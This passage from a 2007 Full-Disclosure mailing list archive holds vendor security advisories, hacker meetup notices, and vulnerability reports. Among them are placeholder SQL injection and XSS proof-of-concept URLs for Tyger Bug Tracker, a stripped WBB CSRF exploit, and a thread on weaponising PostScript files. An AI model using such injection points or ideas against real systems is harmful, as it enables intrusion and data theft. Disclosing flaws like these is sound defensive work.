2007 17:34:19 +0100 Subject: [Full-disclosure] [ GLSA 200703-05 ] Mozilla Suite: Multiple vulnerabilities Message-ID: <20070303163419.GB8439@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla Suite: Multiple vulnerabilities Date: March 03, 2007 Bugs: #135257 ID: 200703-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Several vulnerabilities exist in the Mozilla Suite, which is no longer supported by the Mozilla project. Background ========== The Mozilla Suite is a popular all-in-one web browser that includes a mail and news reader. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/mozilla <= 1.7.13 Vulnerable! 2 www-client/mozilla-bin <= 1.7.13 Vulnerable! ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== Several vulnerabilities ranging from code execution with elevated privileges to information leaks affect the Mozilla Suite. Impact ====== A remote attacker could entice a user to browse to a specially crafted website or open a specially crafted mail that could trigger some of the vulnerabilities, potentially allowing execution of arbitrary code, denials of service, information leaks, or cross-site scripting attacks leading to the robbery of cookies of authentication credentials. Workaround ========== Most of the issues, but not all of them, can be prevented by disabling the HTML rendering in the mail client and JavaScript on every application. Resolution ========== The Mozilla Suite is no longer supported and has been masked after some necessary changes on all the other ebuilds which used to depend on it. Mozilla Suite users should unmerge www-client/mozilla or www-client/mozilla-bin, and switch to a supported product, like SeaMonkey, Thunderbird or Firefox. # emerge --unmerge "www-client/mozilla" # emerge --unmerge "www-client/mozilla-bin" References ========== [ 1 ] Official Advisory http://www.mozilla.org/projects/security/known-vulnerabilities.html#Mozilla Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/f5810cdb/attachment.bin From announce-noreply at rpath.com Sat Mar 3 14:13:03 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Sat, 03 Mar 2007 09:13:03 -0500 Subject: [Full-disclosure] rPSA-2007-0048-1 tcpdump Message-ID: <45e9826f.IDuL/PXXLBSOh6LT%announce-noreply@rpath.com> rPath Security Advisory: 2007-0048-1 Published: 2007-03-03 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Remote User Deterministic Denial of Service Updated Versions: tcpdump=/conary.rpath.com at rpl:devel//1/3.9.5-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1218 https://issues.rpath.com/browse/RPL-1100 Description: Previous versions of the tcpdump package are vulnerable to a remote denial of service when printing 802.11 ethernet frames, only if the link type was specified explicitly on the tcpdump command line. No unauthorized access is understood to be enabled by this vulnerability. From announce-noreply at rpath.com Sat Mar 3 14:15:51 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Sat, 03 Mar 2007 09:15:51 -0500 Subject: [Full-disclosure] rPSA-2007-0040-3 firefox thunderbird Message-ID: <45e98317.YlMP32diPSAISo2N%announce-noreply@rpath.com> rPath Security Advisory: 2007-0040-3 Published: 2007-02-26 Updated: 2007-02-26 Correctly formatted CVE URLs 2007-03-03 Added newly-release thunderbird packages to advisory Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: firefox=/conary.rpath.com at rpl:devel//1/1.5.0.10-0.1-1 thunderbird=/conary.rpath.com at rpl:devel//1/1.5.0.10-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 https://issues.rpath.com/browse/RPL-1081 https://issues.rpath.com/browse/RPL-1103 Description: Previous versions of the firefox package are vulnerable to several types of attacks, some of which are understood to allow compromised or malicious sites to run arbitrary code as the user running the firefox browser. 2 March 2007 Update: The vulnerabilities previously resolved in the firefox have now been resolved in the thunderbird package as well. From shyaam at gmail.com Fri Mar 2 12:41:11 2007 From: shyaam at gmail.com (Shyaam) Date: Fri, 2 Mar 2007 07:41:11 -0500 Subject: [Full-disclosure] March NorthernVirginia 2600/DefCon 571 Meeting Information Message-ID: Hi All, There will be NoVA 2600 meeting on March 2nd, which is today and DC571 meeting Next friday, which is Mar 9th. If anyone from NoVA has any questions about meeting locations, please do contact me at this email. Kind Regards Shyaam -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/9e459efd/attachment.html From marcio.barbado at gmail.com Fri Mar 2 14:57:55 2007 From: marcio.barbado at gmail.com (M.B.Jr.) Date: Fri, 2 Mar 2007 11:57:55 -0300 Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information In-Reply-To: <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com> References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com> <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com> Message-ID: <2df3b0cb0703020657o158cbc47u53b2293d0184edcf@mail.gmail.com> haha modern days underground survivors! viva mr. Corley-Goldstein! On 3/1/07, James Matthews wrote: > > Great i cannot wait! > > On 2/28/07, Steven McGrath wrote: > > > > The March Chicago 2600 Meeting is near! The meeting will be Friday, > > March 2nd at the Neighborhood Boys and Girls Club and will feature much > > of the same usual fun that all of you have grown to expect! > > > > [Presentation Information] > > - 9:00pm - Hacklab: Current Progress (Maniac, et al.) > > - 10:00pm - How to build a public server (Maniac) > > - After hours - Wii, Music, Socializing, etc. > > > > [General Information] > > - Meeting Time: 7.00pm - Approx. 3-5am > > - Meeting Date: Friday, March 2nd > > - Place : 2501 W Irving Park Road, Chicago > > - More Info : http://chicago2600.net > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > http://www.goldwatches.com/watches.asp?Brand=39 > http://www.wazoozle.com > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Marcio Barbado, Jr. ============== ============== -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/013daf8b/attachment.html From mc.iglo at googlemail.com Fri Mar 2 19:41:21 2007 From: mc.iglo at googlemail.com (MC Iglo) Date: Fri, 2 Mar 2007 20:41:21 +0100 Subject: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day In-Reply-To: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com> References: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com> Message-ID: <99e73caa0703021141w17874804p58a2e65e19a55907@mail.gmail.com> On my WBB 2.3.3 (and i think, this is the default setting) you cannot access register.php when logged in (even as admin). So you need to be logged off to open the evil site. And when you are logged off, the cookie is simply useless. Also, on my Forum, only r_dateformat and r_timeformat are affected. regards 2007/3/2, SaMuschie : > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > +--------------------------------------- - -- - > | SaMuschie Research Labs proudly presents . . . > +------------------------------------------- -- - - > | Application: Woltlab Burning Board (wbb) > | Version: 2.3.6 (others not testet) > | Vuln./Exploit Type: CSRF/XSS > | Status: 0day > +----------------------------------------- -- - - > | Discovered by: Samenspender > | Released: 20070302 > | SaMuschie Release Number: 5 > +------------------------------- - -- - > > CSRF/XSS Exploit: > > cat < wetpussy.html >
> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
> > EOF > > +----------------------------- -- - > | Lameness Disclaimer > +------------------------------------- - -- - - > | SaMuschie Research Labs was founded to publish > | vulnerabilities within well known software products, > | which are easy to discover and exploit. > | > | SaMuschie researchers just spend a minimum of time > | and knowledge for each vulnerability. Hence readers of > | this advisory are requested not to ask any questions > | to the researchers.... they don't know the answer ;) > +---------------------------------- - -- - - > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD > Qg6at+bMTnvHbw0SYyXk5ko= > =7wPg > -----END PGP SIGNATURE----- > > > > > > > ___________________________________________________________ > Der fr?he Vogel f?ngt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de > > From skodliv at gmail.com Sat Mar 3 15:04:27 2007 From: skodliv at gmail.com (poo) Date: Sat, 3 Mar 2007 16:04:27 +0100 Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit In-Reply-To: <45E85F73.40401@digit-labs.org> References: <45E85F73.40401@digit-labs.org> Message-ID: keep disclosin! On 3/2/07, mu-b wrote: > > Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including > the > latest). The vulnerability is a bog-standard stack based overflow in the > call at offset 0x00417CD6 (MEIMAPS.exe, v2.37). > > > --------------------------------------------------------------------------- > (mu-b at digit-labs.org) > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -- smile tomorrow will be worse -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/a0b8118b/attachment.html From corrado.liotta at alice.it Sat Mar 3 17:39:06 2007 From: corrado.liotta at alice.it (corrado.liotta at alice.it) Date: Sat, 3 Mar 2007 18:39:06 +0100 Subject: [Full-disclosure] Tyger Bug Tracking System Multiple Vulnerability Message-ID: -=[--------------------ADVISORY-------------------]=- Tyger Bug Tracking System Author: CorryL [corryl80 at gmail.com] -=[-----------------------------------------------]=- -=[+] Application: Tyger Bug Tracking System -=[+] Version: 1.1.3 -=[+] Vendor's URL: http://uk.homeunix.org/tyger/cms/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Cross-Site Script\Sql injection -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.xoned.net -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. Tyger Bug tracking software has been designed and developed or individuals or groups of software developers to manage software development better. By using Tyger teams of developers are able to communicate far better with each fellow developers or end user's which ultimately improves the quality of your software project or product. ..::[ Proof Of Concept ]::.. [Sql injection] http://remote_server/ViewBugs.php?s=[sql]&o=ASC [Xss] http://remote_server/Login.php/>">[XSS] http://remote_server/Register.php/>">[XSS] -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/9269680a/attachment.html From psz at observed.de Sat Mar 3 19:06:46 2007 From: psz at observed.de (Paul Sebastian Ziegler) Date: Sat, 03 Mar 2007 20:06:46 +0100 Subject: [Full-disclosure] PostScript security research Message-ID: <45E9C746.50804@observed.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi, I'm currently coming across a lot of PostScript documents. And I realize that most people consider them as "pictures" and thus plainly open them. This is why I thought about testing it's security and possibly creating some PoC to raise awareness. During my research I found that PostScript has the possibility to open and manipulate files. Now that's a good start. :) Also this project here proves that it must somehow be possible to "bind" to a port: http://public.planetmirror.com/pub/pshttpd/ (Still researching this one...) However google hasn't been particularly helpful when it came to the following questions: 1) Has anybody researched this before (no need to crash open doors) 2) Is PostScript capable of using the system()-call or something similar? Does anybody know about this? Thanks in advance Paul -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF6cdGaHrXRd80sY8RCsj6AKCT9KwwH/+GCw/td1ZCLN6E4MqF+wCgixu5 fnqrvlvr37O36zEeBfD3BJA= =/lno -----END PGP SIGNATURE----- From falco at gentoo.org Sat Mar 3 19:28:03 2007 From: falco at gentoo.org (Raphael Marichez) Date: Sat, 3 Mar 2007 20:28:03 +0100 Subject: [Full-disclosure] ERRATA: [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code Message-ID: <20070303192803.GC23196@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE] GLSA 200703-01:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Snort: Remote execution of arbitrary code Date: February 23, 2007 Updated: March 02, 2007 Bugs: #167730 ID: 200703-01:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata ====== The initial workaround provided by the GLSA does not avoid the mentioned vulnerability. The corrected section appears below. Workaround ========== Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc' section in /etc/snort/snort.conf . Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/0ca3ae99/attachment.bin From metaur at telia.com Sat Mar 3 22:44:23 2007 From: metaur at telia.com (Ulf Harnhammar) Date: Sat, 3 Mar 2007 23:44:23 +0100 Subject: [Full-disclosure] PostScript security research Message-ID: <20070303224423.GA3016@localhost.localdomain> > Also this project here proves that it must somehow be possible to "bind" > to a port: http://public.planetmirror.com/pub/pshttpd/ > (Still researching this one...) I don't think it does. According to this link, ps-httpd gets started from (x)inetd: http://209.85.135.104/search?q=cache:1k8IXp9mFDcJ:www.xent.com/april00/0257.html+%22ps-httpd%22+%2Binetd&hl=sv&ct=clnk&cd=3&gl=se It's a nice hack, anyway! Regards, Ulf Harnhammar From falco at gentoo.org Sun Mar 4 00:11:27 2007 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 4 Mar 2007 01:11:27 +0100 Subject: [Full-disclosure] [ GLSA 200703-06 ] AMD64 x86 emulation Qt library: Integer overflow Message-ID: <20070304001127.GD3492@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: AMD64 x86 emulation Qt library: Integer overflow Date: March 04, 2007 Bugs: #153704 ID: 200703-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== The AMD64 x86 emulation Qt library makes use of an insecure version of the Qt library, potentially allowing for the remote execution of arbitrary code. Background ========== The AMD64 x86 emulation Qt library for AMD64 emulates the x86 (32-bit) Qt library on the AMD64 (64-bit) architecture. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 emul-linux-x86-qtlibs < 10.0 >= 10.0 Description =========== An integer overflow flaw has been found in the pixmap handling of Qt, making the AMD64 x86 emulation Qt library vulnerable as well. Impact ====== By enticing a user to open a specially crafted pixmap image in an application using the AMD64 x86 emulation Qt library, a remote attacker could cause an application crash or the remote execution of arbitrary code with the rights of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All AMD64 x86 emulation Qt library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/emul-linux-x86-qtlibs-10.0" References ========== [ 1 ] GLSA 200611-02 http://www.gentoo.org/security/en/glsa/glsa-200611-02.xml [ 2 ] CVE-2006-4811 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/66dafcd1/attachment.bin From slythers at gmail.com Sun Mar 4 12:05:31 2007 From: slythers at gmail.com (Slythers Bro) Date: Sun, 4 Mar 2007 13:05:31 +0100 Subject: [Full-disclosure] md5 is breaked with my new lib qbyte v2 In-Reply-To: <8f6a58